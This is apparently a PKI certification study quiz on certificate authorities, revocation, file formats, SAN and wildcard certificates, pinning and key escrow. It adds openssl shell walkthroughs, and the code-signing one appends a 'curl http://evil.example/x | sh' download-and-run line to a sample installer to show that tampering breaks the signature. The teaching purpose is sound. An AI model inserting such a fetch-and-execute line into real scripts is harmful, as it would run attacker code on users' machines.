PKI quiz
A trusted third party that issues digital certificates, binding a subject's identity to its public key so that signatures made with the matching private key can be verified, is known as:
CA (certificate authority)
What mechanisms allow a client to check whether a digital certificate has been revoked?
- CRL (certificate revocation list): a CA-signed list of revoked certificate serial numbers that the client downloads and searches
- OCSP (online certificate status protocol): a per-certificate status query sent to the CA's OCSP responder
What are the components of a three-level Certificate Authority (CA) hierarchy?
- Root CA: top level of the hierarchy; self-signed and normally kept offline
- Intermediate CA: middle level, certified by the root
- Issuing CA: third level, certified by the intermediate; signs the end-entity certificates
These certificates carry a lower level of trust because they are not signed by a Certificate Authority (CA): the subject signs its own certificate, so a client has nothing to chain it to unless it is explicitly added to the trust store.
Self-signed certificates
In a Public Key Infrastructure (PKI), which option best describes how users and multiple Certificate Authorities (CA) share information and exchange certificates?
Trust model
A digital certificate issued to a software developer/publisher, following an identity check and validation process by the CA, and used to digitally sign the publisher's scripts and executables (the code is signed, not encrypted). The certificate binds the publisher's identity to its public key; the matching private key produces the signatures.
code signing certificate
A security engineer must install an X.509 certificate on a computer system, but it is not accepted. The system requires a Base64-encoded format. What must the security engineer do to install this certificate?
Convert it to a .pem file: a DER-encoded binary certificate can be represented as ASCII text using Base64 Privacy-Enhanced Mail (PEM) encoding.
What is the purpose of a Certificate Signing Request (CSR)?
To obtain a certificate. A subject completes a Certificate Signing Request (CSR) and submits it to the Certificate Authority (CA). The CSR is a Base64 ASCII file containing information about the requester, including its public key, and it is signed with the requester's private key to prove possession of that key.
A root Certificate Authority (CA) and intermediate CAs are fully deployed. The system administrator turns off the root CA server. Why is the root CA powered-down?
To protect the root CA's private key. The root is needed only to sign intermediate CA certificates and its own CRL, so it is kept offline; a compromised root key would compromise every certificate in the hierarchy.
This term refers to the process of verifying the authenticity of a newly received digital certificate. It involves checking every certificate in the chain, from a trusted root CA, through any intermediate CAs, down to the certificate issued to the end entity. A new certificate can only be trusted if each certificate in its chain is properly issued and valid.
Certificate chaining
Which property of a computer certificate is now deprecated in favor of a more structured and widely accepted standard?
Common Name (CN): it was used to carry the fully qualified domain name (FQDN) by which the server is accessed, such as www.comptia.org. This has been deprecated as a method of validating subject identity in favor of the Subject Alternative Name (SAN) extension.
In a digital certificate, the ____________ field describes a device, an individual, an organization, or any other entity the certificate has been issued for. In a TLS/SSL server certificate, this traditionally held the Fully Qualified Domain Name (FQDN) of the server protected by the certificate.
Common Name (CN)
These certificates prove only that the applicant controls a domain; no further identity vetting is performed.
Domain validation certificates
What are the characteristic features of the Distinguished Encoding Rules (DER) digital certificate format?
- Encoded in binary format (raw ASN.1)
- .der and .cer file extensions
- Generally used for Java servers
Which of the following answers refer to the P7B digital certificate format?
- Encoded in text (ASCII Base64) format
- .p7b file extension
- Holds one or more certificates (typically a chain), never a private key
- Generally used for Microsoft Windows and Apache Tomcat (Java) servers
Which of the following answers refer to the Privacy-Enhanced Mail (PEM) digital certificate format?
- Encoded in text (ASCII Base64) format, between -----BEGIN ...----- and -----END ...----- armor lines
- .pem, .crt, .cer and .key file extensions
- Generally used for Apache servers or similar configurations
These certificates provide the highest level of trust, because the CA performs the most rigorous identity vetting of the organization before issuing them.
Extended Validation (EV) certificates
A company wants to ensure users can validate the website's certificate and establish a secure connection to mitigate Man-in-the-Middle (MitM) attacks on their public website. If an attacker obtains a fraudulent but CA-trusted certificate for the site, which of the following will most likely defeat the attack?
HPKP (HTTP Public Key Pinning): the client stores (pins) a hash of a public key belonging to the web server and rejects any certificate chain that does not contain that key, even if the chain is otherwise valid under the CA hierarchy. HPKP has since been deprecated by browsers.
These certificates provide improved security during authentication and authorization of individuals.
User digital certificates
examples of PKI trust models
- Single CA model
- Hierarchical model (root CA + intermediate CAs)
- Mesh model (cross-certifying CAs)
- Web of trust model (no CAs; users vouch for each other's keys, as in PGP)
- Client-server mutual authentication model
A digital certificate that allows multiple domains to be protected by a single certificate; it provides a structured way to list all of the domain names and IP addresses that the certificate secures.
Subject Alternative Name (SAN) certificate
What is the fastest way of checking the validity of a digital certificate?
OCSP (Online Certificate Status Protocol): one small request about a single certificate, instead of downloading and searching the CA's whole CRL
Can be used to sign and encrypt email messages, typically using Secure/Multipurpose Internet Mail Extensions (S/MIME) or Pretty Good Privacy (PGP). The user's email address must appear in the SAN (as an rfc822Name entry) and, conventionally, in the subject/CN as well.
email certificate
A computer needs a signed certificate to authenticate to the network. What must the computer initiate with a Certificate Authority (CA)?
CSR (certificate signing request): must be completed by a subject that wants to obtain a certificate from a Certificate Authority (CA). The CSR is a Base64 ASCII file containing information about the requester, including its public key.
- A Base64 ASCII file containing the information the subject wants in the certificate, including its public key
- Submitted to the CA to obtain a certificate
CSR - certificate signing request
Which of the answers listed below refers to a method for requesting a digital certificate?
CSR: certificate signing request
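Worked example (added here; it is not part of the original quiz): generating a CSR with the openssl command line and checking what it actually carries. The subject www.example.com, the organization name and the file names are placeholders, and it assumes an openssl of version 1.1.1 or later (for -addext) on the PATH.

```shell
#!/bin/sh
# Added example: build and inspect a Certificate Signing Request with openssl.
# Names (www.example.com, Example Corp) and file names are made up.

set -eu

# Work in a throwaway directory so nothing on the host is touched.
WORK=$(mktemp -d)
cd "$WORK"

# 1. The subject generates its own key pair; the private key never leaves here.
make_key() {
    openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out server.key 2>/dev/null
}

# 2. The CSR binds the requested subject and SAN to the PUBLIC key and is
#    self-signed with the private key to prove possession of it.
make_csr() {
    openssl req -new -key server.key -out server.csr \
        -subj "/C=US/O=Example Corp/CN=www.example.com" \
        -addext "subjectAltName=DNS:www.example.com,DNS:example.com" 2>/dev/null
}

# A CSR is Base64 (PEM) text with its own armor header.
csr_is_pem() {
    grep -q -- '-----BEGIN CERTIFICATE REQUEST-----' server.csr
}

# The CA (or RA) checks the proof-of-possession signature before anything else.
csr_signature_ok() {
    openssl req -in server.csr -noout -verify >/dev/null 2>&1
}

# The public key inside the CSR is the one derived from server.key ...
csr_pubkey_matches_key() {
    a=$(openssl req -in server.csr -noout -pubkey 2>/dev/null)
    b=$(openssl pkey -in server.key -pubout 2>/dev/null)
    [ "$a" = "$b" ]
}

# ... and the private key is NOT in the CSR: only the public half is submitted.
csr_has_no_private_key() {
    ! grep -q 'PRIVATE KEY' server.csr
}

make_key
make_csr
echo "What the CA will see in the request:"
openssl req -in server.csr -noout -subject
openssl req -in server.csr -noout -text | sed -n '/Subject Alternative Name/{n;p;}'
```

The three checks are the ones a CA or RA performs first on an incoming request: the file is PEM text, its self-signature proves the requester holds the private key, and the embedded public key is the only key material that was submitted.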
These certificates are used to verify the authenticity and integrity of software.
Code-signing certificates
These certificates are used to prove the identity of devices.
Computer certificates AKA machine certificates
Many certificates are used to verify identity. Which type of certificate could be issued to network appliances?
Machine: Machine certificates may be issued to network appliances, such as routers, switches, and firewalls.
Which certificate format allows the transfer of private keys and is password protected?
PFX (PKCS #12): a .pfx or .p12 file can carry a certificate (with its chain) together with its private key and is password protected. It is used to archive or transport a private key.
What refers to a hierarchical system for the creation, management, storage, distribution, and revocation of digital certificates?
Public Key Infrastructure (PKI)
A system admin must create certificates for 20 new web and file servers in different subdomains and wants to keep management overhead low in the future, especially with plans to expand services to other branch locations. Which type of certificate is most effective at reducing that overhead?
Wildcard
Which digital certificate type allows multiple subdomains to be protected by a single certificate?
Wildcard certificate
A company deployed an internal web portal for company-owned software and services. When user workstations go to the website from Internet Explorer, the site is not trusted. Evaluate the scenario to conclude the likely cause of this issue.
The internal root CA certificate has not been imported into the workstations' trusted root store, so the portal's certificate cannot be chained to a trust anchor.
A system admin received a support ticket regarding a website error. Browsing to company.com in Internet Explorer, the site looks safe and trusted. However browsing to payment.company.com, the website is no longer trusted. Knowing a wildcard certificate was installed, how would the admin resolve this error?
Update the SAN (subject alternative name): every name by which the server is reached must match an entry, and a wildcard entry such as *.company.com matches exactly one label, so any name it does not cover must be listed explicitly.
An independent penetration testing company is invited to test the company's new banking application, in development for Android phones. It uses Secure Sockets Layer/Transport Layer Security (SSL/TLS) certificates. Penetration tests reveal that connections with clients are vulnerable to a Man-in-the-Middle (MITM) attack. How can the company prevent this on the public Internet?
Use certificate pinning: the app embeds the expected server certificate or public-key hash and, when it inspects the certificate the server presents, refuses the connection unless that pinned value is present, even if an otherwise CA-trusted certificate is offered.
A certificate used with multiple subdomains of a domain. The wildcard is represented with an asterisk (*), such as *.google.com, and matches a single label level.
wildcard certificate
There are various formats for encoding a certificate as a digital file for exchange between different systems. One difference is storing both public and private keys versus only storing a public key. Which of the following stores both public and private keys?
- .p12 (PKCS #12): allows the export of the private key together with the certificate
- .pfx: uses the same binary format as .p12
A security engineer received a .cer file. After some troubleshooting, the engineer was able to install the certificate with Base64 encoding using a different extension. Which of the following extensions did the engineer most likely use?
.pem
What are the characteristic features of the Personal Information Exchange (PFX) and P12 digital certificate format?
- .pfx and .p12 file extensions
- Encoded in binary format
- Password protected; can carry the private key alongside the certificate
- Generally used for Microsoft Windows servers
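Worked example (added here; not part of the original quiz): one self-signed certificate round-tripped through the DER, PEM, P7B and PFX/P12 containers with openssl, showing what each one does and does not contain. The subject name formats.example, the file names and the password are invented for the demonstration; it assumes openssl on the PATH.

```shell
#!/bin/sh
# Added example: the same certificate in DER, PEM, P7B and PFX/P12 form.
# Subject, file names and the password are made up.

set -eu
WORK=$(mktemp -d)
cd "$WORK"
PASS='correct horse battery'

# A throwaway self-signed certificate plus its private key, both in PEM.
make_cert() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
        -keyout server.key -out server.pem -subj "/CN=formats.example" 2>/dev/null
}

# PEM -> DER: strip the Base64 armor, leaving the raw ASN.1 bytes.
pem_to_der() { openssl x509 -in server.pem -outform DER -out server.der; }

# DER -> PEM: Base64-encode the same bytes and put the armor lines back.
der_to_pem() { openssl x509 -in server.der -inform DER -out roundtrip.pem; }

# DER is binary: the first byte is the ASN.1 SEQUENCE tag 0x30.
der_first_byte() { head -c 1 server.der | od -An -tx1 | tr -d ' \n'; }

# PEM is text: the armor header says what is inside.
pem_header() { head -n 1 server.pem; }

# Changing the encoding changes the container, not the certificate.
fingerprint() { openssl x509 -in "$1" -noout -fingerprint -sha256 | cut -d= -f2; }
same_cert_after_roundtrip() { [ "$(fingerprint server.pem)" = "$(fingerprint roundtrip.pem)" ]; }

# P7B (PKCS #7) bundles one or more certificates, never a private key.
to_p7b() { openssl crl2pkcs7 -nocrl -certfile server.pem -out server.p7b; }
p7b_cert_count() { openssl pkcs7 -in server.p7b -print_certs -noout | grep -c '^subject='; }

# PFX/P12 (PKCS #12) carries the private key too, so it is password protected.
to_pfx() {
    openssl pkcs12 -export -inkey server.key -in server.pem \
        -out server.pfx -passout "pass:$PASS"
}
pfx_yields_private_key() {
    openssl pkcs12 -in server.pfx -nocerts -nodes -passin "pass:$PASS" 2>/dev/null \
        | grep -q 'PRIVATE KEY'
}
pfx_rejects_wrong_password() {
    ! openssl pkcs12 -in server.pfx -nocerts -nodes -passin 'pass:wrong' >/dev/null 2>&1
}

make_cert
pem_to_der; der_to_pem; to_p7b; to_pfx
echo "DER first byte: $(der_first_byte)   PEM header: $(pem_header)"
echo "certificates in P7B: $(p7b_cert_count)"
```

The fingerprint comparison is the quick way to confirm that a converted file is still the same certificate; the PKCS #12 step is the only one that needs a password, because it is the only container here that holds the private key.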
Servers designated as a root, intermediate, and issuing server, are examples of which type of implementation?
Certificate Authority (CA)
What is the PKI role of Registration Authority (RA)?
- Accepting requests for digital certificates
- Authenticating (vetting) the entity making the request and passing approved requests on to the CA, which is the component that actually signs and issues the certificate
These certificates are self-signed certificates that identify a root Certificate Authority (CA).
Root certificates
A network administrator is importing a list of certificates from an online source so employees can trust and communicate securely with public websites. Another set of certificates were imported in order to trust and securely communicate with intranet sites and other internal resources. Which type of certificate is currently being imported?
Root: public root certificates allow users to trust a public website through a chain of trust up to the root authority. Private organizations must load employee web browsers with their internal root certificates to verify internal websites.
These certificates are used to encrypt and digitally sign email messages.
S/MIME certificates
- This extension field is the preferred mechanism to identify the DNS name or names by which a host is identified.
- The field is structured to represent different types of identifiers, including domain names, IP addresses and email addresses. If a certificate carries it, the browser validates against it and ignores the CN value.
- It also allows one certificate to cover several subdomains, or several unrelated domains.
SAN - subject alternative name
A system admin installed a new certificate onto a web server. Browsing to the website, the browser shows trust errors. After clicking on the certificate icon, the website's name and information look correct. How would the system administrator troubleshoot further to find a root cause?
Check the certificate chain (chain of trust): the subject details are correct, so the likely causes are that the server is not sending the intermediate CA certificate(s), or that the issuing root is not in the client's trust store.
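Worked example (added here; not part of the original quiz): a three-level chain built with openssl (an offline root, an intermediate, an end-entity certificate), then verified three ways: with the root trusted and the intermediate supplied, with the root missing from the trust store (the "root certificate is not imported" case), and with the intermediate missing (the server not sending its chain). CA names, the host name www.example.com and file names are invented; it assumes openssl 1.1.0 or later on the PATH.

```shell
#!/bin/sh
# Added example: root -> intermediate -> leaf chain, verified with and without
# each link. CA names and file names are made up.

set -eu
WORK=$(mktemp -d)
cd "$WORK"

# Extension profiles. A certificate must assert CA:TRUE to be accepted as an
# issuer during verification; the end entity says CA:FALSE.
printf 'basicConstraints=critical,CA:TRUE\nkeyUsage=critical,keyCertSign,cRLSign\n' > ca.ext
printf 'basicConstraints=critical,CA:FALSE\nsubjectAltName=DNS:www.example.com\n' > leaf.ext

# Key pair + CSR for one name (the CSR is what an RA/CA would receive).
new_request() { # $1=file prefix, $2=subject
    openssl req -new -newkey rsa:2048 -nodes -keyout "$1.key" -out "$1.csr" -subj "$2" 2>/dev/null
}

build_chain() {
    new_request root "/CN=Quiz Root CA"
    new_request int  "/CN=Quiz Intermediate CA"
    new_request leaf "/CN=www.example.com"
    # Root: self-signed. In production this key stays on an offline machine and
    # is used only to sign intermediates and the root CRL.
    openssl x509 -req -in root.csr -signkey root.key -days 2 -extfile ca.ext -out root.pem 2>/dev/null
    # Intermediate: signed by the root.
    openssl x509 -req -in int.csr -CA root.pem -CAkey root.key -CAcreateserial \
        -days 1 -extfile ca.ext -out int.pem 2>/dev/null
    # Leaf (end entity): signed by the intermediate, never by the root directly.
    openssl x509 -req -in leaf.csr -CA int.pem -CAkey int.key -CAcreateserial \
        -days 1 -extfile leaf.ext -out leaf.pem 2>/dev/null
}

# -no-CAfile/-no-CApath keep the system trust store out of the picture, so the
# outcome depends only on what we explicitly trust (-CAfile) and on what a server
# would send next to its own certificate (-untrusted).
chain_ok() {           # root trusted, intermediate supplied by the server
    openssl verify -no-CAfile -no-CApath -CAfile root.pem -untrusted int.pem leaf.pem >/dev/null 2>&1
}
fails_without_root() { # root never imported into the trust store
    ! openssl verify -no-CAfile -no-CApath -untrusted int.pem leaf.pem >/dev/null 2>&1
}
fails_without_intermediate() { # server forgot to send the chain
    ! openssl verify -no-CAfile -no-CApath -CAfile root.pem leaf.pem >/dev/null 2>&1
}

build_chain
echo "--- complete chain:"
openssl verify -no-CAfile -no-CApath -CAfile root.pem -untrusted int.pem -show_chain leaf.pem
echo "--- root not trusted:"
openssl verify -no-CAfile -no-CApath -untrusted int.pem leaf.pem 2>&1 || true
echo "--- intermediate not sent:"
openssl verify -no-CAfile -no-CApath -CAfile root.pem leaf.pem 2>&1 || true
```

The two failure messages differ in a useful way: a missing root reports the lookup failure at depth 1 (the intermediate has no issuer), while a missing intermediate reports it at depth 0 (the leaf itself has no issuer), which is the first thing to read when a browser shows a trust error on a certificate whose subject looks right.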
A company developed new software and would like the software to be validated. Which certificate should the company request?
Code signing certificate: issued to a software publisher, following an identity check and validation process by the CA. The publisher then signs the executables or DLLs that make up the program so that users can verify the authenticity and integrity of the software application or browser plug-in.
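Worked example (added here; not part of the original quiz): code signing reduced to its essentials with openssl, a detached signature over a file made with the publisher's private key, verified with the public key taken from the publisher's certificate, and shown to fail after a one-line change to the file. The publisher name, the sample installer and the file names are constructed for the demonstration; a self-signed certificate stands in for one issued by a CA, and it assumes openssl 1.1.1 or later on the PATH.

```shell
#!/bin/sh
# Added example: sign a file with a code-signing key, verify it, tamper, re-verify.
# Publisher name, sample script and file names are made up.

set -eu
WORK=$(mktemp -d)
cd "$WORK"

# Publisher's key and (self-signed, for the demo) code-signing certificate.
# The extendedKeyUsage marks what the certificate is meant for.
openssl req -x509 -newkey rsa:2048 -nodes -days 1 -keyout publisher.key -out publisher.pem \
    -subj "/O=Example Software Ltd/CN=Example Software Code Signing" \
    -addext "extendedKeyUsage=codeSigning" 2>/dev/null

# The "executable" being shipped (constructed sample).
printf '#!/bin/sh\necho installing...\n' > installer.sh

# Sign: SHA-256 digest of the file, signed with the publisher's PRIVATE key.
# Nothing is encrypted; anyone can still read installer.sh.
sign_file() { openssl dgst -sha256 -sign publisher.key -out "$1.sig" "$1"; }

# Verify: take the PUBLIC key out of the certificate and check the signature.
# (A real verifier also chains publisher.pem to a trusted CA and checks the EKU.)
verify_file() {
    openssl x509 -in publisher.pem -pubkey -noout > publisher.pub 2>/dev/null
    openssl dgst -sha256 -verify publisher.pub -signature "$1.sig" "$1" >/dev/null 2>&1
}

cert_has_codesigning_eku() {
    openssl x509 -in publisher.pem -noout -text | grep -q 'Code Signing'
}

original_verifies() { verify_file installer.sh; }

# Tamper: append one line (think supply-chain implant) and keep the old signature.
tampered_fails() {
    cp installer.sh tampered.sh
    cp installer.sh.sig tampered.sh.sig
    printf 'curl http://evil.example/x | sh\n' >> tampered.sh
    ! verify_file tampered.sh
}

plaintext_still_readable() { grep -q 'installing' installer.sh; }

sign_file installer.sh
if original_verifies; then echo "installer.sh: signature OK"; fi
if tampered_fails;    then echo "tampered.sh: signature REJECTED"; fi
```

The signature covers the digest of the whole file, so any change, however small, is detected; what code signing does not do is hide the code, which is why the quiz's "encrypt" wording is wrong.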
An up-and-coming entrepreneur wants to build an online business. During the creation of the website, the owner emails a third-party certificate service and is able to set up a trusted and secure website within 24 hours. Which process supports the quick turnaround time for web server setup?
Domain validation (proving control of the domain, for example by responding to an email sent to an address at that domain or by completing a DNS or HTTP challenge); no manual identity vetting is needed.
The system administrator is installing a web server certificate and receives an error indicating the server does not accept wildcard certificates. After examining the certificate, the system admin notices the problem. Analyze the error to determine the specific location where the admin found the problem.
In the SAN (subject alternative name): the extension field on a web server certificate that lists the names, including wildcard labels such as *.example.com, by which the server can be identified.
A company with multiple types of archived encrypted data is looking to archive the keys needed to decrypt the data. However, the company wants to separate the two in order to heavily guard these keys. Analyze the scenario to determine the most likely key placement.
key escrow
A trusted third-party storage solution providing backup source for cryptographic keys is referred to as:
key escrow
A new employee at the office is having difficulty sending an encrypted email. The user confirmed with the system administrator the Secure/Multipurpose Internet Mail Extensions (S/MIME) plug-in was installed on the email client. Analyze the scenario to determine the cause of the issue.
Need an email certificate: the S/MIME plug-in can only sign with a certificate and private key issued to the user's email address, and it needs the recipient's certificate (public key) in order to encrypt to them.
A private key is being exported to transfer to another server. There is no .pfx option. Which of the following certificate extensions can support the transfer of this private key?
.p12 (PKCS #12, the same format as .pfx)
Which of the following answers refers to a deprecated security mechanism designed to defend HTTPS websites against impersonation attacks performed with the use of fraudulent digital certificates?
HPKP (HTTP Public Key Pinning): an obsolete Internet security mechanism delivered via an HTTP header, which allowed HTTPS websites to resist impersonation by attackers using mis-issued or otherwise fraudulent digital certificates
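Worked example (added here; not part of the original quiz): computing the value that HPKP's Public-Key-Pins header carried, and that mobile apps embed when they pin, namely base64(SHA-256(DER SubjectPublicKeyInfo)), with openssl, and showing why it is a key pin rather than a certificate pin: two certificates issued on the same key yield the same pin, while a certificate for the same name on a different key does not. The name pin.example and the file names are invented; it assumes openssl on the PATH.

```shell
#!/bin/sh
# Added example: SPKI SHA-256 pins and how they behave across renewal and key change.
# Subject name and file names are made up.

set -eu
WORK=$(mktemp -d)
cd "$WORK"

# pin = base64( SHA-256( DER-encoded SubjectPublicKeyInfo ) )
spki_pin() { # $1=certificate file
    openssl x509 -in "$1" -pubkey -noout 2>/dev/null \
        | openssl pkey -pubin -outform DER 2>/dev/null \
        | openssl dgst -sha256 -binary \
        | openssl base64 -A
}

# One key pair, two certificates (an ordinary renewal that keeps the key) ...
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out pinned.key 2>/dev/null
openssl req -new -x509 -key pinned.key -subj "/CN=pin.example" -days 1 -out cert-year1.pem 2>/dev/null
openssl req -new -x509 -key pinned.key -subj "/CN=pin.example/O=Renewed" -days 1 -out cert-year2.pem 2>/dev/null
# ... and a certificate for the same name on a brand-new key: a planned key
# rotation, or an attacker holding a mis-issued certificate.
openssl req -x509 -newkey rsa:2048 -nodes -keyout other.key -subj "/CN=pin.example" -days 1 \
    -out cert-otherkey.pem 2>/dev/null

pin_survives_renewal() { [ "$(spki_pin cert-year1.pem)" = "$(spki_pin cert-year2.pem)" ]; }
pin_changes_with_key() { [ "$(spki_pin cert-year1.pem)" != "$(spki_pin cert-otherkey.pem)" ]; }

echo "pin-sha256=\"$(spki_pin cert-year1.pem)\""
echo "same pin after renewal on the same key: $(pin_survives_renewal && echo yes || echo no)"
echo "same pin on a different key:            $(pin_changes_with_key && echo no || echo yes)"
```

The third case is what makes pinning both effective and dangerous: a fraudulent certificate for the site fails the pin check regardless of which CA signed it, but so does the site's own certificate after an unplanned key rotation unless a backup pin was published in advance, which is the operational risk that led browsers to drop HPKP.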
Copies of lost private encryption keys can be retrieved from a key escrow by whom? These are individuals with access to the key database and a permission level that allows them to extract keys from escrow.
recovery agents
A Public Key Infrastructure (PKI) can produce many types of certificates with private/public key pairs. In contrast to a self-signed certificate, how does a wildcard certificate benefit an organization?
Reduces management overhead: one certificate covers all of the organization's subdomains at that level, so fewer certificates have to be requested, deployed and renewed.
Which of the following allows a client to check digital certificate revocation status without contacting the Certificate Authority (CA)? It is used with the Online Certificate Status Protocol (OCSP): the TLS web server periodically fetches a signed status response for its own certificate from the CA's responder and attaches it to the TLS handshake, reducing the load on the responder and the client's round trips.
OCSP stapling